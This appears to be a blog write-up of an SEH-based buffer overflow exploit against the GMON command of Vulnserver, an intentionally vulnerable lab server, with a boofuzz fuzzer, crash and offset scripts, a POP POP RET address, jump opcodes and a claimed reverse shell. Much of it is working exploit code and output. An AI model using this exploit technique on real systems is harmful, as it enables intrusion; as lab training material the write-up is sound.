Vulnserver GMON exploit

SEH based buffer overflow for GMON command in vulnserver.

Image for post
Image for post

Crashing the program!

from boofuzz import *
import time
def get_banner(target, my_logger, session, *args, **kwargs):
banner_template = b"Welcome to Vulnerable Server! Enter HELP for help."
try:
banner = target.recv(10000)
except:
print("Unable to connect. Target is down. Exiting.")
exit(1)
my_logger.log_check('Receiving banner..')
if banner_template in banner:
my_logger.log_pass('banner received')
else:
my_logger.log_fail('No banner received')
print("No banner received, exiting..")
exit(1)
def main():session = Session(
target=Target(
connection=SocketConnection("192.168.0.109", 9999, proto='tcp')
),sleep_time=0.5,
)
# Setup
s_initialize(name="Request")
with s_block("Host-Line"):
s_static("GMON", name='command name')
s_delim(" ", fuzzable=False)
s_string("FUZZ")
s_delim("\r\n")
# Fuzzing
session.connect(s_get("Request"), callback=get_banner)
session.fuzz()
if __name__ == "__main__":
main()
Image for post
Image for post
Image for post
Image for post
No Banner as program crashed
Image for post
Image for post
import socket
import os
import sys
host = "192.168.0.109"
port = 9999
buffer = 'A'*5013s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send("GMON /.:/" + buffer)
print s.recv(1024)
s.close()
Image for post
Image for post
Registers are overwritten with 41
Image for post
Image for post
SEH Chain corrupted with 41
Image for post
Image for post
#Original crash payload size = 5013
#SEH Handler Offset = 3519
#nSEH Offset is 3519-4 = 3515
seh = "BBBB"
nseh = "CCCC"
buffer = 3515*"A"
buffer+= nseh
buffer+= seh
buffer+= "D"*(5013-len(buffer))
s.send("GMON /.:/" + buffer)
Image for post
Image for post
Successfully placed B and C in SEH and nSEH respectively

Checking for bad characters

Image for post
Image for post
No bad characters detected other than 0x00

POP, POP, RET!

Image for post
Image for post
POP POP RET locations
#Original crash payload size = 5013
#SEH Handler Offset = 3519
#nSEH Offset is 3519-4 = 3515
seh = "\x2B\x17\x50\x62"
nseh = "\xEB\x06\x90\x90"
buffer = ""
buffer+= "A"*3515
buffer+= nseh
buffer+= seh
buffer+= "D"*(5013-len(buffer))
s.send("GMON /.:/" + buffer)
Image for post
Image for post
Breakpoint added on POP POP RET memory location
Image for post
Image for post
Short Jump

Jumping Back

Image for post
Image for post
Image for post
Image for post
push esp
pop eax
add ax, 0x565
jmp eax
Image for post
Image for post
seh = "\x2B\x17\x50\x62"
nseh = "\xEB\x06\x90\x90"
jumpback = "\x54\x58\x66\x05\x65\x05\xff\xe0"
buffer = ""
buffer+= "A"*3515
buffer+= nseh
buffer+= seh
buffer+= jumpback
buffer+= "D"*(5013-len(buffer))
Image for post
Image for post
Image for post
Image for post
EIP is at the memory location where ‘A’s are stored
Image for post
Image for post
Got reverse shell!

Reference

I like computers and offensive security.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store